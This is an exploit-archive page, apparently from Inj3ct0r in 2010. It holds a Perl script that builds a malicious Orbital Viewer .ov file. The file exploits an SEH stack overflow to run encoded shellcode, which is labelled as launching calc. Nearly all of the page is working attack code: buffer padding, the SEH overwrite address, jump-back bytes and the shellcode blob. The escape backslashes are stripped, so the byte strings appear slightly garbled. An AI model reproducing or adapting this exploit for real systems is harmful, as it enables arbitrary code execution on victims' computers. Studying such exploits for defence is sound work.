Orbital Viewer v1.04 (.ov) Local Universal Stack Overflow Ex

Posted on 19 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Orbital Viewer v1.04 (.ov) Local Universal Stack Overflow Exploit (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================================
Orbital Viewer v1.04 (.ov) Local Universal Stack Overflow Exploit (SEH)
=======================================================================


#!usr/bin/perl
#########################################################################################
#Pro: Orbital Viewer v1.04 (.orb/.ov) Local Universal Stack Overflow Exploit [SEH]
#Author: Crazy_Hacker
#Download: http://www.orbitals.com/orb/setupov.exe
#Date: 20-6-2010
#Tested: WinXp SP2
##########################################################################################
 
$junk = 6060;
$header = &quot;OrbitalFileV1.0
&quot;;
$nseh = &quot;xebxf9xffxff&quot;; # jmp back 7 bytes
$seh = &quot;x0bx0bx27x00&quot;; # universal pop ebx - pop eax - ret at 0x00457C03 [ov.exe]
$fly_by = &quot;xe9x52xfexffxff&quot;; # jmp back 430 bytes = land on A's =&gt; nops =&gt; shellcode
 
#calc
$shellcode =
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;.
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;.
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;.
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;.
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34&quot;.
&quot;x42x50x42x50x42x30x4bx38x45x34x4ex43x4bx48x4ex47&quot;.
&quot;x45x30x4ax47x41x50x4fx4ex4bx48x4fx44x4ax41x4bx48&quot;.
&quot;x4fx55x42x52x41x30x4bx4ex49x54x4bx58x46x43x4bx38&quot;.
&quot;x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c&quot;.
&quot;x46x37x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e&quot;.
&quot;x46x4fx4bx43x46x55x46x32x46x30x45x47x45x4ex4bx48&quot;.
&quot;x4fx35x46x32x41x30x4bx4ex48x56x4bx58x4ex30x4bx44&quot;.
&quot;x4bx58x4fx55x4ex31x41x50x4bx4ex4bx58x4ex51x4bx48&quot;.
&quot;x41x50x4bx4ex49x58x4ex55x46x42x46x30x43x4cx41x33&quot;.
&quot;x42x4cx46x36x4bx38x42x44x42x53x45x48x42x4cx4ax37&quot;.
&quot;x4ex30x4bx48x42x54x4ex30x4bx58x42x57x4ex51x4dx4a&quot;.
&quot;x4bx38x4ax36x4ax50x4bx4ex49x30x4bx48x42x48x42x4b&quot;.
&quot;x42x50x42x50x42x50x4bx48x4ax56x4ex33x4fx35x41x53&quot;.
&quot;x48x4fx42x56x48x45x49x38x4ax4fx43x58x42x4cx4bx57&quot;.
&quot;x42x35x4ax46x42x4fx4cx58x46x50x4fx55x4ax36x4ax59&quot;.
&quot;x50x4fx4cx38x50x50x47x35x4fx4fx47x4ex43x36x41x56&quot;.
&quot;x4ex56x43x46x42x30x5a&quot;;
$nops = &quot;x90&quot; x 20;
$payload = $nops.$shellcode.$fly_by;
$p_size = length($payload);
$final = $junk-$p_size;
$buffer = &quot;x41&quot; x $final;
$exploit = $header.$buffer.$payload.$nseh.$seh;
 
open(my $c_h,&quot;&gt;&gt; exploit.ov&quot;);
print $c_h $exploit;
close $c_h;
 
print &quot;File wuz created successfully!&quot;;



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20